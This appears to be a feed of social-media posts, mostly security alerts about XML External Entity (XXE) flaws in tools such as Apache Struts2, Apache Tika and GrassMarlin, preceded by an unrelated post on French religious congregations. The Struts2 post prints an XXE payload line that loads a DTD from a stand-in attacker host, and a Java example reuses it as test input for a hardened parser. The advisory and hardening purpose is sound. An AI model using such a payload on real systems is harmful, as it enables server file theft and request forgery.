In the heated debates over the place of religious congregations and the legal status to grant them, at the turn of the 19th and 20th centuries in France, the question of property guided politicians and legislators - the famous "milliard des congrégations" (the congregations' billion) of Waldeck-Rousseau. More than a century later, in research and scholarship, this management of property, by the French administration as much as by the religious congregations themselves, remains little studied.

A look back at some of these issues this week, when I am speaking on "Bans, liquidations and seizures: the property strategies of teaching congregations facing anti-congregation legislation (France, 1880-1940)" at a conference organised by the Université de Sherbrooke on the management of religious heritage.
An opportunity to dive back into certain aspects and documents directly linked to my doctoral thesis (available online on HAL).

https://www.usherbrooke.ca/sodrus/evenements/colloque-annuel

#religious_studies #SciencesSocialesDesReligions #France #CongregationReligieuse #religion #XIXe #XXe #patrimoine

CISA Warns of Data Theft Bug in NSA-Built OT Networking Tool

A critical vulnerability, CVE-2026-6807, has been discovered in an NSA-built networking tool that could allow hackers to steal sensitive information by exploiting an XML parsing weakness. If left unpatched, this flaw could lead to devastating data breaches.

https://osintsights.com/cisa-warns-of-data-theft-bug-in-nsa-built-ot-networking-tool?utm_source=mastodon&utm_medium=social

#Cve20266807 #XmlExternalEntity #Xxe #Grassmarlin #Nsa

CISA Warns of Data Theft Bug in NSA-Built OT Networking Tool

Learn about CVE-2026-6807, an XML External Entity weakness in NSA-built OT networking tool GrassMarlin, and take steps to protect sensitive information now.

OSINTSights
⚠️ CRITICAL: CVE-2026-32251 in tolgee-platform (<3.166.3) allows authenticated users to exploit XXE for file read & SSRF. Patch to 3.166.3+ ASAP! Limit XML imports & monitor for abuse. Details: https://radar.offseq.com/threat/cve-2026-32251-cwe-611-improper-restriction-of-xml-6ee364da #OffSeq #CVE202632251 #infosec #XXE

Gitlab, A Foxy Recipe For Success — An XXE & A Mouth-Watering $66,000 Bounty
This vulnerability was a combination of XML External Entity (XXE) Injection and Cross-Site Scripting (XSS). The application used an external library without proper input validation, allowing the researcher to inject malicious XML payloads. By exploiting this XXE, they could read arbitrary files from the server's file system, including sensitive configuration files containing internal API keys. Additionally, the XXE triggered an XSS vulnerability when outputting the parsed XML content, enabling attackers to execute arbitrary JavaScript in the victim's browser. The researcher received a $66,000 bounty for discovering this critical flaw. To mitigate such attacks, ensure proper input validation of external libraries and restrict access to sensitive files through the use of least privilege principles. Key lesson: Validate inputs at multiple layers, and don't trust third-party libraries blindly. #BugBounty #Cybersecurity #WebSecurity #XXE #XSS

https://medium.com/@justas_b_2/gitlab-a-foxy-recipe-for-success-an-xxe-a-mouth-watering-66-000-bounty-595e0f9cd611?source=rss------bug_bounty-5

Gitlab, A Foxy Recipe For Success — An XXE & A Mouth-Watering $66,000 Bounty

Hi, my name’s Pearl Shu and today we will prepare a mouth watering dish.

Medium

CVE-2025-68493: Apache Struts2 XWork-Core XXE

Technical Breakdown: Our AI agent, ZAST.AI, uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that lacks security feature flags: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING

Attack Vector: By manipulating the InputSource, an attacker can inject a malicious DTD.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
- Result: Full LFI (e.g., /etc/passwd, win.ini) and SSRF capabilities.

Status: Assigned CVE-2025-68493.

Affects Struts2 <= 6.0.3. Patching is critical.

🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

#XXE #CyberSecurity #ZAST #CVE #ApacheStruts2
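A hardened SAXParserFactory set-up of the kind the post says DomHelper.parse() is missing, shown as an added example that is not code from Struts/XWork or from ZAST.AI. It assumes the JDK's built-in Xerces parser (the apache.org feature URIs are Xerces ones) and feeds a constructed input that reuses the DTD declaration shape quoted in the post.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;
import java.io.StringReader;

public final class HardenedSaxParsing {

    // Factory with the XXE-relevant features set explicitly (assumes the JDK's
    // built-in Xerces, which recognises the apache.org feature URIs).
    static SAXParserFactory hardenedFactory() throws ParserConfigurationException, SAXException {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Refuse any DOCTYPE: no DTD means no internal, external or parameter entities.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Also set explicitly so the parser stays safe if the DOCTYPE ban is ever relaxed.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        return factory;
    }

    // Parses with the hardened factory; returns false when the parser rejects the input.
    static boolean acceptedByHardenedParser(String xml) throws Exception {
        SAXParser parser = hardenedFactory().newSAXParser();
        try {
            parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXException e) {
            // With disallow-doctype-decl, a DOCTYPE surfaces here as a SAXParseException.
            System.err.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed input: the external parameter-entity declaration shape from the advisory.
        String withDtd = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE data [ <!ENTITY % dtd SYSTEM \"http://attacker/evil.dtd\"> ]>\n"
                + "<data/>";
        String plain = "<data><item>ok</item></data>";
        System.out.println("DOCTYPE input accepted: " + acceptedByHardenedParser(withDtd));
        System.out.println("plain input accepted: " + acceptedByHardenedParser(plain));
    }
}
```

The hardened factory rejects the DOCTYPE input before any entity is declared, while a factory created with plain newInstance() and no setFeature calls accepts it, which is the gap the post describes.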

Security Issues with Electronic Invoices

Information about security issues like XXE and other problems with electronic invoices based on EU standards.

⚠️ CRITICAL XXE bug (CVE-2025-66516, CVSS 10.0) in Apache Tika (tika-core, tika-pdf-module, tika-parsers). Exploitation via crafted PDFs can lead to file disclosure & RCE. Upgrade to 3.2.2+ ASAP! https://radar.offseq.com/threat/critical-xxe-bug-cve-2025-66516-cvss-100-hits-apac-d08561e7 #OffSeq #ApacheTika #XXE #Security

🚨 CVE-2025-66516 CRITICAL: XXE in Apache Tika core (v1.13–3.2.1), tika-pdf-module, tika-parsers. Exploitable via crafted PDF XFA files — risks data exfil & DoS. Patch to 3.2.2+ now! https://radar.offseq.com/threat/cve-2025-66516-cwe-611-improper-restriction-of-xml-fa601313 #OffSeq #ApacheTika #XXE #Vuln

Very well-written breakdown of the discovery and patching of XXE and ../ in Xerox FreeFlow.

https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/

#cve #xxe

From Support Ticket to Zero Day

Examining Critical Vulnerabilities in Xerox FreeFlow Core (CVE-2025-8355 and CVE-2025-8356)

Horizon3.ai

XXE vulnerabilities from a Java perspective

In this article we look at the XXE security defect in the context of Java. We discuss its causes and possible consequences, look at examples and, of course, cover ways to defend against it.

https://habr.com/ru/companies/axiomjdk/articles/934388/

#XXE #Java #XML #security #информационная_безопасность #axiomjdk #axiom_jdk #openjdk #libercat
